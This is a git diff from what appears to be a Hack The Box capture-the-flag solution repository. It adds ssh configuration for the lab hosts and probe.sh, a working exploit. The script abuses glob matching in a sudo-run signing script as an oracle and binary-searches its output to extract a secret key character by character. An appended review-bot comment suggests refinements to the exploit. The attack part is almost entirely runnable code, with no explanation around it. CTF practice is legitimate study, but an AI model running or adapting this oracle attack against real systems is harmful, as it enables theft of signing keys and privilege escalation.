"urllib3-2.2.2.tar.gz", hash = "sha256:dd505485549a7a552833da5e6063639d0d177c04f23bc3864e41e5dc5f612168"}, +] + +[package.extras] +brotli = ["brotli (>=1.0.9)", "brotlicffi (>=0.8.0)"] +h2 = ["h2 (>=4,<5)"] +socks = ["pysocks (>=1.5.6,!=1.5.7,<2.0)"] +zstd = ["zstandard (>=0.18.0)"] + +[metadata] +lock-version = "2.0" +python-versions = "^3.10" +content-hash = "9fe327963e7285423f56ab83ddc9a37c4cd3681f23cee6ecc62f03807959d902" diff --git a/probe.sh b/probe.sh 
@@ -0,0 +1,143 @@
+#!/bin/sh
+
+sch_sarray_is_empty() {
+ sarray=$1
+ [ -z "$sarray" ]
+}
+
+sch_sarray_len() {
+ sarray=$1
+ i=0
+ for element in $sarray; do
+ i=$((i + 1))
+ done
+ printf '%d' "$i"
+}
+
+sch_sarray_append() {
+ sarray=$1
+ shift
+ if sch_sarray_is_empty "$sarray"; then
+ printf '%s' "$*"
+ else
+ printf '%s' "$sarray $*"
+ fi
+}
+
+sch_sarray_take() {
+ sarray=$1
+ n="$2"
+ result=''
+ i=0
+ for element in $sarray; do
+ if [ "$i" -eq "$n" ]; then
+ break
+ fi
+ result=$(sch_sarray_append "$result" "$element")
+ i=$((i + 1))
+ done
+ printf '%s' "$result"
+}
+
+sch_sarray_skip() {
+ sarray=$1
+ n=$2
+ result=''
+ i=0
+ for element in $sarray; do
+ if [ "$i" -ge "$n" ]; then
+ result=$(sch_sarray_append "$result" "$element")
+ fi
+ i=$((i + 1))
+ done
+ printf '%s' "$result"
+}
+
+sch_sarray_first() {
+ sarray=$1
+ result=''
+ for element in $sarray; do
+ printf '%s' "$element"
+ return 0
+ done
+ return 1
+}
+
+custom='- = + / \040 \n'
+uppercase="A B C D E F G H I J K L M N O P Q R S T U V W X Y Z"
+lowercase="a b c d e f g h i j k l m n o p q r s t u v w x y z"
+digits="0 1 2 3 4 5 6 7 8 9"
+charset="$custom $uppercase $lowercase $digits"
+
+ca="/tmp/x"
+
+known=""
+
+check() {
+ printf -- "$1" > "$ca"
+ sudo /opt/sign_key.sh "$ca" /dev/null root _ 10086 2>/dev/null | grep API >/dev/null
+}
+
+check_pattern() {
+ known=$1
+ pattern=$2
+ check "$known$pattern*"
+}
+
+pattern_in() {
+ sarray=$1
+ pattern='['
+ for c in $sarray; do
+ pattern="$pattern$c"
+ done
+ pattern="$pattern]"
+ printf '%s' "$pattern"
+}
+
+
+search_among() {
+ sarray=$1
+ callback=$2
+ [ -z "$callback" ] && return 1
+ shift; shift
+ n=$(sch_sarray_len "$sarray")
+ partition0=$(sch_sarray_take "$sarray" $((n / 2)))
+ pattern0=$(pattern_in "$partition0")
+ partition1=$(sch_sarray_skip "$sarray" $((n / 2)))
+ pattern1=$(pattern_in "$partition1")
+ if ! sch_sarray_is_empty "$partition0" && ($callback "$@" "$pattern0"); then
+ if [ $(sch_sarray_len "$partition0") -eq 1 ]; then
+ sch_sarray_first "$partition0"
+ return 0
+ else
+ search_among "$partition0" "$callback" "$@"
+ return $?
+ fi
+ elif ! sch_sarray_is_empty "$partition1" && ($callback "$@" "$pattern1"); then
+ if [ $(sch_sarray_len "$partition1") -eq 1 ]; then
+ sch_sarray_first "$partition1"
+ return 0
+ else
+ search_among "$partition1" "$callback" "$@"
+ return $?
+ fi
+ fi
+ return 1
+}
+
+while true; do
+ c=$(search_among "$charset" check_pattern "$known")
+ if [ $? -eq 0 ]; then
+ known="$known$c"
+ if check $known; then
+ printf "ok:\n$known\n" >&2
+ printf -- "$known"
+ break
+ fi
+ else
+ printf "stuck at:\n$known\n" >&2
+ break
+ fi
+done
+
+rm "$ca"
diff --git a/pyproject.toml b/pyproject.toml
@@ -0,0 +1,18 @@
+[tool.poetry]
+name = "htb-season-6-resource"
+version = "0.1.0"
+description = ""
+authors = ["y5c4l3 <y5c4l3@proton.me>"]
+license = "MIT"
+readme = "README.md"
+
+[tool.poetry.dependencies]
+python = "^3.10"
+
+
+[tool.poetry.group.dev.dependencies]
+requests = "^2.32.3"
+
+[build-system]
+requires = ["poetry-core"]
+build-backend = "poetry.core.masonry.api"
diff --git a/ssh_config b/ssh_config
@@ -0,0 +1,17 @@
+Host itrc
+ Hostname itrc.ssg.htb
+ IdentityFile ./keys/id_self
+ IdentitiesOnly yes
+ CertificateFile ./keys/id_self-itrc.pub
+Host mitrc
+ Hostname itrc.ssg.htb
+ User msainristil
+ IdentityFile ./keys/id_self
+ IdentitiesOnly yes
+Host ssg
+ Hostname signserv.ssg.htb
+ Port 2222
+ IdentityFile ./keys/id_self
+ IdentitiesOnly yes
+ CertificateFile ./keys/id_self-remote.pub
+ CertificateFile ./keys/id_self-ssg.pub
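Review bot: In probe.sh, `check` and the final `printf -- "$known"` pass data as the printf format string, which is what turns the `\040` and `\n` entries of `custom` into a space and a newline, but nothing in the script says this is deliberate. A comment above `check` such as `# format string on purpose: \040 and \n in the argument must be expanded by printf` would keep a later reader from changing it to `printf '%s'`. In the main loop `if check $known; then` leaves `$known` unquoted, unlike every other expansion in the file, and should read `if check "$known"; then`. `sch_sarray_first` assigns `result=''` and never uses it.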